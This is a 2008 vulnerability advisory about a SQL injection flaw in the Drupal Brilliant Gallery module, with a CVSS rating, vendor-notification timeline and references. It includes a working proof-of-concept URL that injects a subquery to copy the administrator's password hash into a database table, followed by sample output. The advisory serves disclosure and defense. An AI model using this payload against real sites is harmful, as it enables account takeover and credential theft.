Drupal Brilliant Gallery module SQL injection vulnerability

2008-09-24 / 2008-09-25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 * Discovery Date: Sept 17, 2008 * Security risk: high * Exploitable from: Remote * Vulnerability: SQL Injection * Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish) Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security. The Brilliant module (http://drupal.org/project/brilliant_gallery), created by Vacilanda (http://www.vacilando.org/) is designed to allow users to easily create dynamic picture galleries by uploading images directly to a server and including code directly within nodes to display the gallery. The critical flaw exists within the brilliant_gallery_checklist_save() function (lines 109-129 of briliant_gallery.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL (defined by a callback in brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These parameters are then used to craft SQL injections via remote URL request. 5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable Testing for Vulnerability Calling the URL: http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from users where uid=1),3),(4,4,4,'4 will cause the administrator password to be inserted into the brilliant_gallery_checklist table in the Drupal database: mysql> select * from brilliant_gallery_checklist; +-----+------+----------------------------------+-------+ | nid | user | qid | state | +-----+------+----------------------------------+-------+ | 2 | 0 | 2 | 2 | | 3 | 3 | 4202a5f87b68583e2eaaa6922c8c38d1 | 3 | | 4 | 4 | 4 | 4 | +-----+------+----------------------------------+-------+ Impact Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation. Determining Version The brilliant_gallery.info page for vulnerable versions displays the following information: ; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $ name = Brilliant Gallery description = Creates a fully customizable table gallery of quality-scaled images from a pre-defined folder. dependencies = lightbox2 colorpicker package = Media ; Information added by drupal.org packaging script on 2008-05-05 version = "5.x-3.1" project = "brilliant_gallery" datestamp = "1210030204" ; Information added by drupal.org packaging script on 2008-07-17 version = "5.x-4.1" project = "brilliant_gallery" datestamp = "1216327204" Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214). Vendor Response Drupal security team contacted via e-mail September 19, 2008. Vendor contacted September 19, 2008 via contact form submission at http://www.vacilando.eu/contact. Vulnerability announcement should be available at http://drupal.org/security by Wednesday, September 24, 2008. No details about patch release are available at this time. - -- Justin C. Klein Keane http://www.MadIrish.net http://Justin.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iPwEAQECAAYFAkjalScACgkQkSlsbLsN1gAR7Ab/bL1vvJvVhIVlkE5aOKUmH3K5 30qO/paQ8xqstrxVT/sMJYN7MXtjYL9gk73qFNhOBEgIbs9Dth7CqBMdk5vT2BiO 3lZcuNuquwLNv2ZhPK6bOUN9G0Pdmntr2YqNTgXCSPNpM7F+K75uPNENRFZKL8Yb DLgn3q1smbJVFLm8/Xt8Y0g7Q7C8kxh7TYTK/WyhNs+KrxlzsilpAViydmqkNuVR ob/nsYj/o5d8DN8vk0xHrvzNbeQCJX2tSZKKh6427zC6zK+dm8uTAnALpHzS/BT5 R2Oq9aOFw1BeGdcUKmk= =QUap -----END PGP SIGNATURE-----

References:

http://xforce.iss.net/xforce/xfdb/45411
http://www.securityfocus.com/bid/31387
http://www.securityfocus.com/archive/1/archive/1/496726/100/0/threaded
http://secunia.com/advisories/32015
http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064662.html
http://drupal.org/node/313054


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top